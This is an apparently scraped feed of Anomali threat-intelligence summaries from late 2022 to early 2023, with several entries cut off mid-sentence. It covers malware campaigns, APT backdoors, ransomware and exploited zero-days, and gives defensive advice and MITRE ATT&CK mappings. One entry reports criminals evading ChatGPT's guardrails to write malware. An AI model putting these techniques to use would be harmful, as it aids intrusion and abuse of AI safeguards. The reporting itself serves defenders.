[mitre att & amp; ck] t1105 - transfert d'outils d'en]]> 2023-03-20T23:29:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt-china-data-leak-injectors-packers-phishing-ransomware-russia-and-ukraine www.secnews.physaphae.fr/article.php?IdArticle=8320062 False Ransomware,Malware,Tool,Vulnerability,Threat,Cloud None 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Xenomorph V3: a New Variant with ATS Targeting More Than 400 Institutions (published: March 10, 2023) Newer versions of the Xenomorph Android banking trojan are able to target 400 applications: cryptocurrency wallets and mobile banking from around the World with the top targeted countries being Spain, Turkey, Poland, USA, and Australia (in that order). Since February 2022, several small, testing Xenomorph campaigns have been detected. Its current version Xenomorph v3 (Xenomorph.C) is available on the Malware-as-a-Service model. This trojan version was delivered using the Zombinder binding service to bind it to a legitimate currency converter. Xenomorph v3 automatically collects and exfiltrates credentials using the ATS (Automated Transfer Systems) framework. The command-and-control traffic is blended in by abusing Discord Content Delivery Network. Analyst Comment: Fraud chain automation makes Xenomorph v3 a dangerous malware that might significantly increase its prevalence on the threat landscape. Users should keep their mobile devices updated and avail of mobile antivirus and VPN protection services. Install only applications that you actually need, use the official store and check the app description and reviews. Organizations that publish applications for their customers are invited to use Anomali's Premium Digital Risk Protection service to discover rogue, malicious apps impersonating your brand that security teams typically do not search or monitor. MITRE ATT&CK: [MITRE ATT&CK] T1417.001 - Input Capture: Keylogging | [MITRE ATT&CK] T1417.002 - Input Capture: Gui Input Capture Tags: malware:Xenomorph, Mobile, actor:Hadoken Security Group, actor:HadokenSecurity, malware-type:Banking trojan, detection:Xenomorph.C, Malware-as-a-Service, Accessibility services, Overlay attack, Discord CDN, Cryptocurrency wallet, target-industry:Cryptocurrency, target-industry:Banking, target-country:Spain, target-country:ES, target-country:Turkey, target-country:TR, target-country:Poland, target-country:PL, target-country:USA, target-country:US, target-country:Australia, target-country:AU, malware:Zombinder, detection:Zombinder.A, Android Cobalt Illusion Masquerades as Atlantic Council Employee (published: March 9, 2023) A new campaign by Iran-sponsored Charming Kitten (APT42, Cobalt Illusion, Magic Hound, Phosphorous) was detected targeting Mahsa Amini protests and researchers who document the suppression of women and minority groups i]]> 2023-03-14T17:32:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-xenomorph-automates-the-whole-fraud-chain-on-android-icefire-ransomware-started-targeting-linux-mythic-leopard-delivers-spyware-using-romance-scam www.secnews.physaphae.fr/article.php?IdArticle=8318511 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline,Conference ChatGPT,ChatGPT,APT 35,APT 42,APT 36 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence MQsTTang: Mustang Panda’s Latest Backdoor Treads New Ground with Qt and MQTT (published: March 2, 2023) In early 2023, China-sponsored group Mustang Panda began experimenting with a new custom backdoor dubbed MQsTTang. The backdoor received its name based on the attribution and the unique use of the MQTT command and control (C2) communication protocol that is typically used for communication between IoT devices and controllers. To establish this protocol, MQsTTang uses the open source QMQTT library based on the Qt framework. MQsTTang is delivered through spearphishing malicious link pointing at a RAR archive with a single malicious executable. MQsTTang was delivered to targets in Australia, Bulgaria, Taiwan, and likely some other countries in Asia and Europe. Analyst Comment: Mustang Panda is likely exploring this communication protocol in an attempt to hide its C2 traffic. Defense-in-depth approach should be used to stop sophisticated threats that evolve and utilize various techniques of defense evasion. Sensitive government sector workers should be educated on spearphishing threats and be wary of executable files delivered in archives. MITRE ATT&CK: [MITRE ATT&CK] T1583.003 - Acquire Infrastructure: Virtual Private Server | [MITRE ATT&CK] T1583.004 - Acquire Infrastructure: Server | [MITRE ATT&CK] T1587.001 - Develop Capabilities: Malware | [MITRE ATT&CK] T1588.002 - Obtain Capabilities: Tool | [MITRE ATT&CK] T1608.001 - Stage Capabilities: Upload Malware | [MITRE ATT&CK] T1608.002 - Stage Capabilities: Upload Tool | [MITRE ATT&CK] T1566.002 - Phishing: Spearphishing Link | [MITRE ATT&CK] T1106: Native API | [MITRE ATT&CK] T1204.002 - User Execution: Malicious File | [MITRE ATT&CK] T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [MITRE ATT&CK] T1036.004 - Masquerading: Masquerade Task Or Service | [MITRE ATT&CK] T1036.005 - Masquerading: Match Legitimate Name Or Location | [MITRE ATT&CK] T1480 - Execution Guardrails | [MITRE ATT&CK] T1622 - Debugger Evasion | ]]> 2023-03-07T16:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-mustang-panda-adopted-mqtt-protocol-redis-miner-optimization-risks-data-corruption-blacklotus-bootkit-reintroduces-vulnerable-uefi-binaries www.secnews.physaphae.fr/article.php?IdArticle=8316353 False Ransomware,Malware,Tool,Vulnerability,Threat,Medical None 1.00000000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence WinorDLL64: A Backdoor From The Vast Lazarus Arsenal? (published: February 23, 2023) When the Wslink downloader (WinorLoaderDLL64.dll) was first discovered in 2021, it had no known payload and no known attribution. Now ESET researchers have discovered a Wslink payload dubbed WinorDLL64. This backdoor uses some of Wslink functions and the Wslink-established TCP connection encrypted with 256-bit AES-CBC cipher. WinorDLL64 has some code similarities with the GhostSecret malware used by North Korea-sponsored Lazarus Group. Analyst Comment: Wslink and WinorDLL64 use a well-developed cryptographic protocol to protect the exchanged data. Innovating advanced persistent groups like Lazarus often come out with new versions of their custom malware. It makes it important for network defenders to leverage the knowledge of a wider security community by adding relevant premium feeds and leveraging the controls automation via Anomali Platform integrations. MITRE ATT&CK: [MITRE ATT&CK] T1587.001 - Develop Capabilities: Malware | [MITRE ATT&CK] T1059.001: PowerShell | [MITRE ATT&CK] T1106: Native API | [MITRE ATT&CK] T1134.002 - Access Token Manipulation: Create Process With Token | [MITRE ATT&CK] T1070.004 - Indicator Removal on Host: File Deletion | [MITRE ATT&CK] T1087.001 - Account Discovery: Local Account | [MITRE ATT&CK] T1087.002 - Account Discovery: Domain Account | [MITRE ATT&CK] T1083 - File And Directory Discovery | [MITRE ATT&CK] T1135 - Network Share Discovery | [MITRE ATT&CK] T1057 - Process Discovery | [MITRE ATT&CK] T1012: Query Registry | [MITRE ATT&CK] Picus: The System Information Discovery Technique Explained - MITRE ATT&CK T1082 | [MITRE ATT&CK] T1614 - System Location Discovery | [MITRE ATT&CK] T1614.001 - System Location Discovery: System Language Discovery | [MITRE ATT&CK] T1016 - System Network Configuration Discovery | [MITRE ATT&CK] T1049 - System Network Connections Discovery |]]> 2023-02-28T16:15:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-newly-discovered-winordll64-backdoor-has-code-similarities-with-lazarus-ghostsecret-atharvan-backdoor-can-be-restricted-to-communicate-on-certain-days www.secnews.physaphae.fr/article.php?IdArticle=8314193 False Ransomware,Malware,Tool,Threat,Medical,Medical,Cloud APT 38 1.00000000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Coinbase Cyberattack Targeted Employees with Fake SMS Alert (published: February 20, 2023) On February 5th, 2023, several employees at the Coinbase cryptocurrency exchange platform received a fake SMS alert on their mobile phones. The message indicated that they need to urgently log in via the link provided to receive an important message. One employee got phished by the attackers, but they failed to login due to the MFA restrictions. The attackers, likely associated with the previously-documented 0ktapus phishing campaign, proceeded to call the employee and phish him for more information by pretending to be from the corporate IT. Coinbase was able to detect the unusual activity and stop the breach, although the attackers have obtained some contact information belonging to multiple Coinbase employees in addition to the login credentials of the phished user. Analyst Comment: Network defenders are advised to monitor for access attempts from a third-party VPN provider, such as Mullvad VPN. Monitor for download of remote desktop viewers such as AnyDesk or ISL Online. Set up monitoring for Incoming phone calls / text messages from Bandwidth dot com, Google Voice, Skype, and Vonage/Nexmo. Anomali Premium Domain Monitoring service notifies customers regarding registration of potential phishing domains. And as always with these types of social engineering attacks employee awareness is key - not just of the threat but how to independently verify the legitimacy of any contact and what to do with anything suspicious. MITRE ATT&CK: [MITRE ATT&CK] T1566.002 - Phishing: Spearphishing Link | [MITRE ATT&CK] T1204 - User Execution | [MITRE ATT&CK] T1219 - Remote Access Software Tags: campaign:0ktapus, Coinbase, Social engineering, SMS, Typosquatting, AnyDesk, ISL Online, Mullvad VPN, Google Voice, Skype, Vonage/Nexmo, Bandwidth, Browser extension, EditThisCookie Earth Kitsune Delivers New WhiskerSpy Backdoor via Watering Hole Attack (published: February 17, 2023) Since the end of 2022, a new campaign by the state-sponsored Earth Kitsune group targets visitors of pro-North Korea websites. A malicious JavaScript embedded into their video pages prompts a viewer to download a codec installer. Only visitors from particular subnets located in Nagoya, Japan and Shenyang, China, and users of a VPN provider in Brazil are receiving the malicious payload. The legitimate codec installer was patched to increase the PE image size and add an additional section. The attackers employ elliptic cryptography to protect encryption keys and use rare hashing algorithms: 32-bit Fowler-Noll-Vo hash (FNV-1) to compute machine IDs and a 32-bit Murmur3 hash of the 16-byte AES key to compute the]]> 2023-02-22T19:12:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-earth-kitsune-uses-chrome-native-messaging-for-persistence-wip26-targets-middle-east-telco-from-abused-clouds-azerbaijan-sponsored-group-geofenced-its-payloads-to-armenian-ips www.secnews.physaphae.fr/article.php?IdArticle=8312556 False Malware,Tool,Threat,Guideline None 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities (published: February 9, 2023) The US and South Korea issued a joint advisory on ongoing, North Korea-sponsored ransomware activity against healthcare and other critical infrastructure. The proceedings are used to fund North Korea’s objectives including further cyber attacks against the US and South Korean defense and defense industrial base sectors. For initial access, the attackers use a trojanized messenger (X-Popup) or various exploits including those targeting Apache log4j2 and SonicWall appliances. Despite having two custom ransomware crypters, Maui and H0lyGh0st, the attackers can portray themselves as a different ransomware group (REvil) and/or use publicly-available crypters, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom. Analyst Comment: Organizations in the healthcare sector should consider following the Cross-Sector Cybersecurity Performance Goals developed by the U.S. Cybersecurity and Infrastructure Security Agency and the U.S. National Institute of Standards and Technology. Follow the principle of least privilege by using standard user accounts on internal systems instead of administrative accounts. Turn off weak or unnecessary network device management interfaces. MITRE ATT&CK: [MITRE ATT&CK] T1583 - Acquire Infrastructure | [MITRE ATT&CK] T1583.003 - Acquire Infrastructure: Virtual Private Server | [MITRE ATT&CK] T1190 - Exploit Public-Facing Application | [MITRE ATT&CK] T1133 - External Remote Services | [MITRE ATT&CK] T1195 - Supply Chain Compromise | [MITRE ATT&CK] T1083 - File And Directory Discovery | [MITRE ATT&CK] T1021 - Remote Services | [MITRE ATT&CK] T1486: Data Encrypted for Impact Tags: malware-type:Ransomware, source-country:North Korea, source-country:DPRK, source-country:KP, target-industry:Healthcare, target-sector:Critical infrastructure, target-industry:Defense, target-industry:Defense Industrial Base, Log4Shell, SonicWall, CVE-2021-44228, CVE-2021-20038, CVE-2022-24990, X-Popup, malware:Maui, malware:H0lyGh0st, malware:BitLocker, malware:Deadbolt, malware:ech0raix, malware:GonnaCry, malware:Hidden Tear, malware:Jigsaw, malware:LockBit 2.0, malware:My Little Ransomware, malware:NxRansomware, malware:Ryuk, malware:YourRansom ]]> 2023-02-14T17:48:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-hospital-ransoms-pay-for-attacks-on-defense-nodaria-got-upgraded-go-based-infostealer-ta866-moved-screenshot-functionality-to-standalone-tool www.secnews.physaphae.fr/article.php?IdArticle=8310132 False Ransomware,Malware,Tool,Threat,Industrial None 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence No Pineapple! –DPRK Targeting of Medical Research and Technology Sector (published: February 2, 2023) In August-November 2022, North Korea-sponsored group Lazarus has been engaging in cyberespionage operations targeting defense, engineering, healthcare, manufacturing, and research organizations. The group has shifted their infrastructure from using domains to be solely IP-based. For initial compromise the group exploited known vulnerabilities in unpatched Zimbra mail servers (CVE-2022-27925 and CVE-2022-37042). Lazarus used off the shelf malware (Cobalt Strike, JspFileBrowser, JspSpy webshell, and WSO webshell), abused legitimate Windows and Unix tools (such as Putty SCP), and tools for proxying (3Proxy, Plink, and Stunnel). Two custom malware unique to North Korea-based advanced persistent threat actors were a new Grease version that enables RDP access on the host, and the Dtrack infostealer. Analyst Comment: Organizations should keep their mail server and other publicly-facing systems always up-to-date with the latest security features. Lazarus Group cyberespionage attacks are often accompanied by stages of multi-gigabyte exfiltration traffic. Suspicious connections and events should be monitored, detected and acted upon. Use the available YARA signatures and known indicators. MITRE ATT&CK: [MITRE ATT&CK] T1587.002 - Develop Capabilities: Code Signing Certificates | [MITRE ATT&CK] T1190 - Exploit Public-Facing Application | [MITRE ATT&CK] picus-security: The Most Used ATT&CK Technique—T1059 Command and Scripting Interpreter | [MITRE ATT&CK] T1569.002: Service Execution | [MITRE ATT&CK] T1106: Native API | [MITRE ATT&CK] T1505.003 - Server Software Component: Web Shell | [MITRE ATT&CK] T1037.005 - Boot or Logon Initialization Scripts: Startup Items | [MITRE ATT&CK] T1053.005 - Scheduled Task/Job: Scheduled Task | [MITRE ATT&CK] T1036.005 - Masquerading: Match Legitimate Name Or Location | [MITRE ATT&CK] T1553 - Subvert Trust Controls | [MITRE ATT&CK] T1070.004 - Indicator Removal on Host: File Deletion | [MITRE ATT&CK] T1070.007 - Indicator Removal: Clear Network Connection History And Configurations | ]]> 2023-02-07T17:23:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-malvirt-obfuscates-with-koivm-virtualization-icebreaker-overlay-hides-v8-bytecode-runtime-interpretation-sandworm-deploys-multiple-wipers-in-ukraine www.secnews.physaphae.fr/article.php?IdArticle=8307984 False Malware,Tool,Threat,Medical,Medical APT 38 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Chinese PlugX Malware Hidden in Your USB Devices? (published: January 26, 2023) Palo Alto researchers analyzed a PlugX malware variant (KilllSomeOne) that spreads via USB devices such as floppy, thumb, or flash drives. The variant is used by a technically-skilled group, possibly by the Black Basta ransomware. The actors use special shortcuts, folder icons and settings to make folders impersonating disks and a recycle bin directory. They also name certain folders with the 00A0 (no-break space) Unicode character thus hindering Windows Explorer and the command shell from displaying the folder and all the files inside it. Analyst Comment: Several behavior detections could be used to spot similar PlugX malware variants: DLL side loading, adding registry persistence, and payload execution with rundll32.exe. Incidents responders can check USB devices for the presence of no-break space as a folder name. MITRE ATT&CK: [MITRE ATT&CK] T1091 - Replication Through Removable Media | [MITRE ATT&CK] T1559.001 - Inter-Process Communication: Component Object Model | [MITRE ATT&CK] T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification | [MITRE ATT&CK] T1574.002 - Hijack Execution Flow: Dll Side-Loading | [MITRE ATT&CK] T1036 - Masquerading | [MITRE ATT&CK] T1027 - Obfuscated Files Or Information | [MITRE ATT&CK] T1564.001: Hidden Files and Directories | [MITRE ATT&CK] T1105 - Ingress Tool Transfer Tags: detection:PlugX, detection:KilllSomeOne, USB, No-break space, file-type:DAT, file-type:EXE, file-type:DLL, actor:Black Basta, Windows Abraham's Ax Likely Linked to Moses Staff (published: January 26, 2023) Cobalt Sapling is an Iran-based threat actor active in hacking, leaking, and sabotage since at least November 2020. Since October 2021, Cobalt Sapling has been operating under a persona called Moses Staff to leak data from Israeli businesses and government entities. In November 2022, an additional fake identity was created, Abraham's Ax, to target government ministries in Saudi Arabia. Cobalt Sapling uses their custom PyDCrypt loader, the StrifeWater remote access trojan, and the DCSrv wiper styled as ransomware. Analyst Comment: A defense-in-depth approach can assist in creating a proactive stance against threat actors attempting to destroy data. Critical systems should be segregated from each other to minimize potential damage, with an]]> 2023-01-31T17:27:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-killlsomeone-folders-invisible-in-windows-everything-apis-abuse-speeds-up-ransomware-apt38-experiments-with-delivery-vectors-and-backdoors www.secnews.physaphae.fr/article.php?IdArticle=8305945 False Ransomware,Malware,Tool,Threat,Medical APT 38 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Roaming Mantis Implements New DNS Changer in Its Malicious Mobile App in 2022 (published: January 19, 2023) In December 2022, a financially-motivated group dubbed Roaming Mantis (Shaoye) continued targeting mobile users with malicious landing pages. iOS users were redirected to phishing pages, while Android users were provided with malicious APK files detected as XLoader (Wroba, Moqhao). Japan, Austria, France, and Germany were the most targeted for XLoader downloads (in that order). All but one targeted country had smishing as an initial vector. In South Korea, Roaming Mantis implemented a new DNS changer function. XLoader-infected Android devices were targeting specific Wi-Fi routers used mostly in South Korea. The malware would compromise routers with default credentials and change the DNS settings to serve malicious landing pages from legitimate domains. Analyst Comment: The XLoader DNS changer function is especially dangerous in the context of free/public Wi-Fi that serve many devices. Install anti-virus software for your mobile device. Users should be cautious when receiving messages with a link or unwarranted prompts to install software. MITRE ATT&CK: [MITRE ATT&CK] T1078.001 - Valid Accounts: Default Accounts | [MITRE ATT&CK] T1584 - Compromise Infrastructure Tags: actor:Roaming Mantis, actor:Shaoye, file-type:APK, detection:Wroba, detection:Moqhao, detection:XLoader, malware-type:Trojan-Dropper, DNS changer, Wi-Fi routers, ipTIME, EFM Networks, Title router, DNS hijacking, Malicious app, Smishing, South Korea, target-country:KR, Japan, target-country:JP, Austria, target-country:AT, France, target-country:FR, Germany, target-country:DE, VK, Mobile, Android Hook: a New Ermac Fork with RAT Capabilities (published: January 19, 2023) ThreatFabric researchers analyzed a new Android banking trojan named Hook. It is a rebranded development of the Ermac malware that was based on the Android banker Cerberus. Hook added new capabilities in targeting banking and cryptocurrency-related applications. The malware also added capabilities of a remote access trojan and a spyware. Its device take-over capabilities include being able to remotely view and interact with the screen of the infected device, manipulate files on the devices file system, simulate clicks, fill text boxes, and perform gestures. Hook can start the social messaging application WhatsApp, extract all the messages present, and send new ones. Analyst Comment: Users should take their mobile device security seriously whether they use it for social messaging or actually provide access to their banking accounts and/or cryptocurrency holdings. Similar to its predecessors, Hook will likely be used by many threat actors (malware-as-as-service model). It means the need to protect from a wide range of attacks: smishing, prompts to install malicious apps, excessive]]> 2023-01-24T16:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-roaming-mantis-changes-dns-on-wi-fi-routers-hook-android-banking-trojan-has-device-take-over-capabilities-ke3chang-targeted-iran-with-updated-turian-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8303740 False Malware,Tool,Threat,Guideline APT 25,APT 15 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Malicious ‘Lolip0p’ PyPi Packages Install Info-Stealing Malware (published: January 16, 2023) On January 10, 2023, Fortinet researchers detected actor Lolip0p offering malicious packages on the Python Package Index (PyPI) repository. The packages came with detailed, convincing descriptions pretending to be legitimate HTTP clients or, in one case, a legitimate improvement for a terminal user interface. Installation of the libraries led to infostealing malware targeting browser data and authentication (Discord) tokens. Analyst Comment: Free repositories such as PyPI become increasingly abused by threat actors. Before adding a package, software developers should review its author and reviews, and check the source code for any suspicious or malicious intent. MITRE ATT&CK: [MITRE ATT&CK] T1204 - User Execution | [MITRE ATT&CK] T1555 - Credentials From Password Stores Tags: actor:Lolip0p, Malicious package, malware-type:Infostealer, Discord, PyPi, Social engineering, Windows Analysis of FG-IR-22-398 – FortiOS - Heap-Based Buffer Overflow in SSLVPNd (published: January 11, 2023) In December 2022, the Fortinet network security company fixed a critical, heap-based buffer overflow vulnerability (FG-IR-22-398, CVE-2022-42475) in FortiOS SSL-VPN. The vulnerability was exploited as a zero-day by an advanced persistent threat (APT) actor who was customizing a Linux implant specifically for FortiOS of relevant FortiGate hardware versions. The targeting was likely aimed at governmental or government-related targets. The attribution is not clear, but the compilation timezone UTC+8 may point to China, Russia, and some other countries. Analyst Comment: Users of the affected products should make sure that the December 2022 FortiOS security updates are implemented. Zero-day based attacks can sometimes be detected by less conventional methods, such as behavior analysis, and heuristic and machine learning based detection systems. Network defenders are advised to monitor for suspicious traffic, such as suspicious TCP sessions with Get request for payloads. MITRE ATT&CK: [MITRE ATT&CK] T1622 - Debugger Evasion | [MITRE ATT&CK] T1190 - Exploit Public-Facing Application | [MITRE ATT&CK] T1105 - Ingress Tool Transfer | [MITRE ATT&CK] T1090 - Proxy | [MITRE ATT&CK] T1070 - Indicator Removal On Host Tags: FG-IR-22-398, CVE-2022-42]]> 2023-01-18T16:35:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-fortios-zero-day-has-been-exploited-by-an-apt-two-rats-spread-by-four-types-of-jar-polyglot-files-promethium-apt-continued-android-targeting www.secnews.physaphae.fr/article.php?IdArticle=8302291 False Malware,Tool,Vulnerability,Threat,Guideline LastPass 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence OPWNAI : Cybercriminals Starting to Use ChatGPT (published: January 6, 2023) Check Point researchers have detected multiple underground forum threads outlining experimenting with and abusing ChatGPT (Generative Pre-trained Transformer), the revolutionary artificial intelligence (AI) chatbot tool capable of generating creative responses in a conversational manner. Several actors have built schemes to produce AI outputs (graphic art, books) and sell them as their own. Other actors experiment with instructions to write an AI-generated malicious code while avoiding ChatGPT guardrails that should prevent such abuse. Two actors shared samples allegedly created using ChatGPT: a basic Python-based stealer, a Java downloader that stealthily runs payloads using PowerShell, and a cryptographic tool. Analyst Comment: ChatGPT and similar tools can be of great help to humans creating art, writing texts, and programming. At the same time, it can be a dangerous tool enabling even low-skill threat actors to create convincing social-engineering lures and even new malware. MITRE ATT&CK: [MITRE ATT&CK] T1566 - Phishing | [MITRE ATT&CK] T1059.001: PowerShell | [MITRE ATT&CK] T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | [MITRE ATT&CK] T1560 - Archive Collected Data | [MITRE ATT&CK] T1005: Data from Local System Tags: ChatGPT, Artificial intelligence, OpenAI, Phishing, Programming, Fraud, Chatbot, Python, Java, Cryptography, FTP Turla: A Galaxy of Opportunity (published: January 5, 2023) Russia-sponsored group Turla re-registered expired domains for old Andromeda malware to select a Ukrainian target from the existing victims. Andromeda sample, known from 2013, infected the Ukrainian organization in December 2021 via user-activated LNK file on an infected USB drive. Turla re-registered the Andromeda C2 domain in January 2022, profiled and selected a single victim, and pushed its payloads in September 2022. First, the Kopiluwak profiling tool was downloaded for system reconnaissance, two days later, the Quietcanary backdoor was deployed to find and exfiltrate files created in 2021-2022. Analyst Comment: Advanced groups are often utilizing commodity malware to blend their traffic with less sophisticated threats. Turla’s tactic of re-registering old but active C2 domains gives the group a way-in to the pool of existing targets. Organizations should be vigilant to all kinds of existing infections and clean them up, even if assessed as “less dangerous.” All known network and host-based indicators and hunting rules associated]]> 2023-01-10T16:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-turla-re-registered-andromeda-domains-spynote-is-more-popular-after-the-source-code-publication-typosquatted-site-used-to-leak-companys-data www.secnews.physaphae.fr/article.php?IdArticle=8299602 False Ransomware,Malware,Tool,Threat ChatGPT,APT-C-36 2.0000000000000000 Anomali - Firm Blog 2023-01-05T05:50:00+00:00 https://www.anomali.com/blog/focusing-on-your-adversary www.secnews.physaphae.fr/article.php?IdArticle=8298031 False Ransomware,Malware,Tool,Vulnerability,Threat,Industrial,Prediction None 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence PyTorch Discloses Malicious Dependency Chain Compromise Over Holidays (published: January 1, 2023) Between December 25th and December 30th, 2022, users who installed PyTorch-nightly were targeted by a malicious library. The malicious torchtriton dependency on PyPI uses the dependency confusion attack by having the same name as the legitimate one on the PyTorch repository (PyPI takes precedence unless excluded). The actor behind the malicious library claims that it was part of ethical research and that he alerted some affected companies via HackerOne programs (Facebook was allegedly alerted). At the same time the library’s features are more aligned with being a malware than a research project. The code is obfuscated, it employs anti-VM techniques and doesn’t stop at fingerprinting. It exfiltrates passwords, certain files, and the history of Terminal commands. Stolen data is sent to the C2 domain via encrypted DNS queries using the wheezy[.]io DNS server. Analyst Comment: The presence of the malicious torchtriton binary can be detected, and it should be uninstalled. PyTorch team has renamed the 'torchtriton' library to 'pytorch-triton' and reserved the name on PyPI to prevent similar attacks. Opensource repositories and apps are a valuable asset for many organizations but adoption of these must be security risk assessed, appropriately mitigated and then monitored to ensure ongoing integrity. MITRE ATT&CK: [MITRE ATT&CK] T1195.001 - Supply Chain Compromise: Compromise Software Dependencies And Development Tools | [MITRE ATT&CK] T1027 - Obfuscated Files Or Information | [MITRE ATT&CK] Picus: The System Information Discovery Technique Explained - MITRE ATT&CK T1082 | [MITRE ATT&CK] T1003.008 - OS Credential Dumping: /Etc/Passwd And /Etc/Shadow | [MITRE ATT&CK] T1041 - Exfiltration Over C2 Channel Tags: Dependency confusion, Dependency chain compromise, PyPI, PyTorch, torchtriton, Facebook, Meta AI, Exfiltration over DNS, Linux Linux Backdoor Malware Infects WordPress-Based Websites (published: December 30, 2022) Doctor Web researchers have discovered a new Linux backdoor that attacks websites based on the WordPress content management system. The latest version of the backdoor exploits 30 vulnerabilities in outdated versions of WordPress add-ons (plugins and themes). The exploited website pages are injected with a malicious JavaScript that intercepts all users clicks on the infected page to cause a malicious redirect. Analyst Comment: Owners of WordPress-based websites should keep all the components of the platform up-to-date, including third-party add-ons and themes. Use ]]> 2023-01-04T16:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-machine-learning-toolkit-targeted-by-dependency-confusion-multiple-campaigns-hide-in-google-ads-lazarus-group-experiments-with-bypassing-mark-of-the-web www.secnews.physaphae.fr/article.php?IdArticle=8297872 False Malware,Tool,Vulnerability,Threat,Patching,Medical APT 38,LastPass 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New RisePro Stealer Distributed by the Prominent PrivateLoader (published: December 22, 2022) RisePro is a new commodity infostealer that is being sold and supported by Telegram channels. Log credentials derived from RisePro are for sale on illicit markets since December 13, 2022. RisePro targets password stores and particular file patterns to extract cookies, credit card information, cryptocurrency wallets, installed software credentials, and passwords. RisePro was delivered by PrivateLoader and these two malware families have significant code similarity. It also shares similarity with the Vidar stealer in a way that both use dropped DLL dependencies. Analyst Comment: Infostealers are a continually rising threat for organizations especially with hybrid workers utilizing their own and other non-corporate devices to access cloud based resources and applications. Information from these sessions, useful to attackers, can be harvested unknown to the worker or end organization. In addition, the rise of threat actor reliance on potent commodity malware is one of the trends that Anomali analysts observe going into 2023 (see Predictions below). Network defenders are advised to block known PrivateLoader and RisePro indicators (available on the Anomali platform). MITRE ATT&CK: [MITRE ATT&CK] T1213 - Data From Information Repositories | [MITRE ATT&CK] T1113 - Screen Capture | [MITRE ATT&CK] T1555.004 - Credentials from Password Stores: Windows Credential Manager | [MITRE ATT&CK] T1140 - Deobfuscate/Decode Files Or Information | [MITRE ATT&CK] T1222: File and Directory Permissions Modification | [MITRE ATT&CK] T1027 - Obfuscated Files Or Information | [MITRE ATT&CK] T1027.005 - Obfuscated Files or Information: Indicator Removal From Tools | [MITRE ATT&CK] T1087 - Account Discovery | [MITRE ATT&CK] T1083 - File And Directory Discovery | [MITRE ATT&CK] T1057 - Process Discovery | [MITRE ATT&CK] T1012: Query Registry | [MITRE ATT&CK] T1518 - Software Discovery | [MITRE ATT&CK] Picus: The System Information Discovery Technique Explained - MITRE ATT&CK T1082 | ]]> 2022-12-29T16:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-zerobot-added-new-exploits-and-ddos-methods-gamaredon-group-bypasses-dns-proxynotshell-exploited-prior-to-dll-side-loading-attacks-and-more www.secnews.physaphae.fr/article.php?IdArticle=8295813 False Malware,Tool,Threat None 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence APT5: Citrix ADC Threat Hunting Guidance (published: December 13, 2022) On December 13, 2022, the US National Security Agency published a report on the ongoing exploitation of Citrix products. Citrix confirmed that this critical remote code execution vulnerability (CVE-2022-27518, CTX474995) affects Citrix Application Delivery Controller™ (Citrix ADC) and Citrix Gateway versions: 12.1 and 13.0 before 13.0-58.32. Active exploitation of the CVE-2022-27518 zero-day was attributed to China-sponsored APT5 (Keyhole Panda, Manganese, UNC2630) and its custom Tricklancer malware. Analyst Comment: All customers using the affected builds are urged to install the current build or upgrade to the newest version (13.1 or newer) immediately. Anomali Platform has YARA signatures for the Tricklancer malware, network defenders are encouraged to follow additional NSA hunting suggestions (LINK). Check md5 hashes for key executables of the Citrix ADC appliance. Analyze your off-device logs: look for gaps and mismatches in logs, 